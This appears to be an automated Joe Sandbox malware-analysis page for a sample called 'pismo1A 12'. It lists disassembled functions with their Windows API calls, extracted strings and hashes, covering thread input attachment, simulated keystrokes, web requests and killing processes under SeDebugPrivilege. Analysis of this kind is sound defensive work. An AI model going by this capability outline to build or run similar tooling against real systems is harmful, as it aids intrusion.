Instruction Fuzzy Hash: 79617D75900248AFEB20DF68CC81EEE77F8EB09710F104199FA15A7292C778AE41DF64

Function 0070B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0070B151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,0070A1E1,?,00000001), ref: 0070B165
GetWindowThreadProcessId.USER32(00000000), ref: 0070B16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0070A1E1,?,00000001), ref: 0070B17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0070B18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0070A1E1,?,00000001), ref: 0070B1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0070A1E1,?,00000001), ref: 0070B1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0070A1E1,?,00000001), ref: 0070B1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0070A1E1,?,00000001), ref: 0070B212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0070A1E1,?,00000001), ref: 0070B21D

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: c19b095c3c2776c4a2e917dd6e60a45c120aa0caea465f94d01a01952b147986
Instruction ID: a32f9a9979e26fdb766e5fdf216458563967755f0b1c92a65465791a6d0bed34
Opcode Fuzzy Hash: c19b095c3c2776c4a2e917dd6e60a45c120aa0caea465f94d01a01952b147986
Instruction Fuzzy Hash: 9A318F71500204FFEB119F64DD49B6D7BAABB61352F108505FA05DA290D7BC9A80CF68

Function 006D2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 006D2C94

Part of subcall function 006D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000), ref: 006D29DE
Part of subcall function 006D29C8: GetLastError.KERNEL32(00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000,00000000), ref: 006D29F0

_free.LIBCMT ref: 006D2CA0
_free.LIBCMT ref: 006D2CAB
_free.LIBCMT ref: 006D2CB6
_free.LIBCMT ref: 006D2CC1
_free.LIBCMT ref: 006D2CCC
_free.LIBCMT ref: 006D2CD7
_free.LIBCMT ref: 006D2CE2
_free.LIBCMT ref: 006D2CED
_free.LIBCMT ref: 006D2CFB

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 91aeb876b91b726c453f3214f33234a4221cc2fbec9301540820de16c16316fa
Instruction ID: 5015f72caaf0c024dd6eaedebfbea3f59ebfa463672c92ce45f735d2a507113b
Opcode Fuzzy Hash: 91aeb876b91b726c453f3214f33234a4221cc2fbec9301540820de16c16316fa
Instruction Fuzzy Hash: 75111936900009BFCB42EF55D862CDC3BA6FF15740F4140AAF9485F322D631EE50AB94

Function 006A1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 006A1459
OleUninitialize.OLE32(?,00000000), ref: 006A14F8
UnregisterHotKey.USER32(?), ref: 006A16DD
DestroyWindow.USER32(?), ref: 006E24B9
FreeLibrary.KERNEL32(?), ref: 006E251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 006E254B

Strings

close all, xrefs: 006A1454

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: f5b305d85712d8920501bd197b1388cfbebc81ff01255809b38115ace5cd7b84
Instruction ID: 0fcc1a91ba823b494cf5f5161e218398c3f9b054f3a7a19969b702c6af3bbf1b
Opcode Fuzzy Hash: f5b305d85712d8920501bd197b1388cfbebc81ff01255809b38115ace5cd7b84
Instruction Fuzzy Hash: 05D18E71702222CFDB19EF15C9A9A69F7A7BF06700F1442ADE44AAB251CB30ED52CF54

Function 006A5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 006A5C7A

Part of subcall function 006A5D0A: GetClientRect.USER32(?,?), ref: 006A5D30
Part of subcall function 006A5D0A: GetWindowRect.USER32(?,?), ref: 006A5D71
Part of subcall function 006A5D0A: ScreenToClient.USER32(?,?), ref: 006A5D99

GetDC.USER32 ref: 006E46F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 006E4708
SelectObject.GDI32(00000000,00000000), ref: 006E4716
SelectObject.GDI32(00000000,00000000), ref: 006E472B
ReleaseDC.USER32(?,00000000), ref: 006E4733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 006E47C4

Strings

U, xrefs: 006E4693

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 512fbc915a7322a96d65c21b812269f718e23596ff8565475da9bf4ab28a92d7
Instruction ID: c22b05684d697f7fe04141d7f5569891b7ff2ede4b07c546cf9655bea53542b1
Opcode Fuzzy Hash: 512fbc915a7322a96d65c21b812269f718e23596ff8565475da9bf4ab28a92d7
Instruction Fuzzy Hash: 9B71CD30401345DFCF21DF74C984AEA7BB2FF4A361F144269E9565A2AACB319C82DF90

Function 0071359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 007135E4

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

LoadStringW.USER32(00772390,?,00000FFF,?), ref: 0071360A

Strings

"%s" (%d) : ==> %s:, xrefs: 00713742
Error: , xrefs: 007136EF
"%s" (%d) : ==> %s:%s%s, xrefs: 00713724
^ ERROR, xrefs: 007136C9
Line %d (File "%s"):, xrefs: 0071366B

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 4b4403c9562ec7f448567dc5c2b2ca53cca8baadeb8346010ca5795fe2cf27c4
Instruction ID: be7bf439f065b4c640ec8e08fa4edfdf51c871f74ca5afa7acb7289665bcfbd6
Opcode Fuzzy Hash: 4b4403c9562ec7f448567dc5c2b2ca53cca8baadeb8346010ca5795fe2cf27c4
Instruction Fuzzy Hash: 96518FB1800219EADF15FBA4CC42EEEBB75AF05340F544129F505721A2EB392F98DFA4

Function 0071C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0071C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0071C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0071C2CA
GetLastError.KERNEL32 ref: 0071C322
SetEvent.KERNEL32(?), ref: 0071C336
InternetCloseHandle.WININET(00000000), ref: 0071C341

Strings

, xrefs: 0071C2BB

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 86f8d5355da47556c05b85840b0d647799e2a4829a9f64e2ad0bbc3c5c204e5d
Instruction ID: 6559f531024e42978254b67b2c239eca9e29991b874c7bc24e16382bc1094b9b
Opcode Fuzzy Hash: 86f8d5355da47556c05b85840b0d647799e2a4829a9f64e2ad0bbc3c5c204e5d
Instruction Fuzzy Hash: 673180B1540204AFE7239FA9CC88AEB7BFCEB49744F14851DF456E2280DB38DD849B65

Function 0070989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,006E3AAF,?,?,Bad directive syntax error,0073CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 007098BC
LoadStringW.USER32(00000000,?,006E3AAF,?), ref: 007098C3

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00709987

Strings

Error: , xrefs: 00709955
., xrefs: 0070996D
Line %d:, xrefs: 00709912
%s (%d) : ==> %s.: %s %s, xrefs: 007098F1
Line %d (File "%s"):, xrefs: 0070992D

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: f112da58cb79d446757c147f604babf1d328b89e1f1c95d1d3e1cbfac2cd8d20
Instruction ID: 644f0d99014f300660f22fb862e2a3b1ee7608d21894a3d3f5b3b8494a584c98
Opcode Fuzzy Hash: f112da58cb79d446757c147f604babf1d328b89e1f1c95d1d3e1cbfac2cd8d20
Instruction Fuzzy Hash: 0721B471800229EBDF56AF90CC06EED7776FF15300F044419F515610A2EB39AA18DF64

Function 0070209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 007020AB
GetClassNameW.USER32(00000000,?,00000100), ref: 007020C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0070214D

Strings

SHELLDLL_DefView, xrefs: 007020CC
list, xrefs: 0070212F
smallicons, xrefs: 00702115
details, xrefs: 007020FB
largeicons, xrefs: 007020E1

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: cb3dd148be3a2d1e2d9393882f92fe4bcf8eaffb1fe7f836ede81ef0a58cf22b
Instruction ID: 0e5e920af8b72ea89eb3d96b20863d65e4089beea5e58a1b8eafce7c2a13a083
Opcode Fuzzy Hash: cb3dd148be3a2d1e2d9393882f92fe4bcf8eaffb1fe7f836ede81ef0a58cf22b
Instruction Fuzzy Hash: 7611E3B768870AF9FA156724DC0FDB677DCCB05324F20021AFA09A50D2FEAD68436618

Function 006DCE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 006DCEB7
_free.LIBCMT ref: 006DCF22
_free.LIBCMT ref: 006DCF48
_free.LIBCMT ref: 006DCF71
_free.LIBCMT ref: 006DCFA9
_free.LIBCMT ref: 006DCFDA
_free.LIBCMT ref: 006DD01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 006DD09C
_free.LIBCMT ref: 006DD0B5

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: f462333f70164177f7e99ab6f076648f54889a298670233d29115b16ec38caa0
Instruction ID: 4c652a9834890ed6955a9da9e7a706e8e5f392c5ea3da29b377eee0bc58fdc36
Opcode Fuzzy Hash: f462333f70164177f7e99ab6f076648f54889a298670233d29115b16ec38caa0
Instruction Fuzzy Hash: 726155B1E0430AAFDB31AFB89891AEA7BA7EF05360F04416FF9049B381D6359D01D794

Function 006B8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 006F6890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 006F68A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 006F68B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 006F68D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 006F68F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,006B8874,00000000,00000000,00000000,000000FF,00000000), ref: 006F6901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 006F691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,006B8874,00000000,00000000,00000000,000000FF,00000000), ref: 006F692D

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 21e0632b76b7af677b7fe89d124d513be1d3380bbe24bf65551fd8cd22cd5a28
Instruction ID: bba1db82c3bd76affe1b14ab5b36dc21a6e1a477601148fccfe895481a6df5c9
Opcode Fuzzy Hash: 21e0632b76b7af677b7fe89d124d513be1d3380bbe24bf65551fd8cd22cd5a28
Instruction Fuzzy Hash: E2517CB0600209EFDB20CF28CC55FEA7BBAFB54750F108518FA56A72A0DB74E991DB54

Function 0071C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0071C182
GetLastError.KERNEL32 ref: 0071C195
SetEvent.KERNEL32(?), ref: 0071C1A9

Part of subcall function 0071C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0071C272
Part of subcall function 0071C253: GetLastError.KERNEL32 ref: 0071C322
Part of subcall function 0071C253: SetEvent.KERNEL32(?), ref: 0071C336
Part of subcall function 0071C253: InternetCloseHandle.WININET(00000000), ref: 0071C341

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: cfcce74d80790283386f86c1b43ee4b7b5807260ae73d4804deefc63a00fbf28
Instruction ID: c98105f0a032b7c1509cfe44425f76bb7a3aecc378138c9263674867e96ba227
Opcode Fuzzy Hash: cfcce74d80790283386f86c1b43ee4b7b5807260ae73d4804deefc63a00fbf28
Instruction Fuzzy Hash: A131A171280605FFDB229FE9DC08AABBBF8FF18301B04841DF95696650C739E854EB60

Function 007025A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00703A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00703A57
Part of subcall function 00703A3D: GetCurrentThreadId.KERNEL32 ref: 00703A5E
Part of subcall function 00703A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007025B3), ref: 00703A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 007025BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007025DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 007025DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 007025E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00702601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00702605
MapVirtualKeyW.USER32(00000025,00000000), ref: 0070260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00702623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00702627

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 2747f31ce07b262d645feec44f8d86326b66ef054f3e1d43f121ece7ee439f5f
Instruction ID: 80e536fd6f987216c85067f47560be7cae3d69f282c02d3d04ab7a66e8591247
Opcode Fuzzy Hash: 2747f31ce07b262d645feec44f8d86326b66ef054f3e1d43f121ece7ee439f5f
Instruction Fuzzy Hash: 0601D471390214FBFB1067689C8FF593F99DB4EB12F104041F318BE1D1C9EA28459A6D

Function 00701803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00701449,?,?,00000000), ref: 0070180C
HeapAlloc.KERNEL32(00000000,?,00701449,?,?,00000000), ref: 00701813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00701449,?,?,00000000), ref: 00701828
GetCurrentProcess.KERNEL32(?,00000000,?,00701449,?,?,00000000), ref: 00701830
DuplicateHandle.KERNEL32(00000000,?,00701449,?,?,00000000), ref: 00701833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00701449,?,?,00000000), ref: 00701843
GetCurrentProcess.KERNEL32(00701449,00000000,?,00701449,?,?,00000000), ref: 0070184B
DuplicateHandle.KERNEL32(00000000,?,00701449,?,?,00000000), ref: 0070184E
CreateThread.KERNEL32(00000000,00000000,00701874,00000000,00000000,00000000), ref: 00701868

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 31f612eb8b1474b28fb1fab3494bca63557e7b71dd44d12f4a2cb41eed22cc61
Instruction ID: fd5595887c1c65e50484738cc03c983366734f66792c93b63480ba7debaf8736
Opcode Fuzzy Hash: 31f612eb8b1474b28fb1fab3494bca63557e7b71dd44d12f4a2cb41eed22cc61
Instruction Fuzzy Hash: 1301A8B5240308BFF611ABA5DC4AF6B3BACEB89B11F418411FA05EB1A1CA7498109B24

Function 0072A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0070D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0070D501
Part of subcall function 0070D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0070D50F
Part of subcall function 0070D4DC: CloseHandle.KERNEL32(00000000), ref: 0070D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0072A16D
GetLastError.KERNEL32 ref: 0072A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0072A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 0072A268
GetLastError.KERNEL32(00000000), ref: 0072A273
CloseHandle.KERNEL32(00000000), ref: 0072A2C4

Strings

SeDebugPrivilege, xrefs: 0072A18F

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 4a2310436393e6ffd0bb8eb55e08dc97d2f6bcd32883f618b4df7fa56964b356
Instruction ID: e7c9d1da8b9dfdc674ac521ec4b0b57778e8cd753dbcbf8bfa8b91acb2d8fc3e
Opcode Fuzzy Hash: 4a2310436393e6ffd0bb8eb55e08dc97d2f6bcd32883f618b4df7fa56964b356
Instruction Fuzzy Hash: 56619D71204252EFD720DF18D894F15BBE1AF84318F18849CE4668B7A3C77AEC45CB96

Function 00733886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00733925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0073393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00733954
_wcslen.LIBCMT ref: 00733999
SendMessageW.USER32(?,00001057,00000000,?), ref: 007339C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 007339F4

Strings

SysListView32, xrefs: 007338F7

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
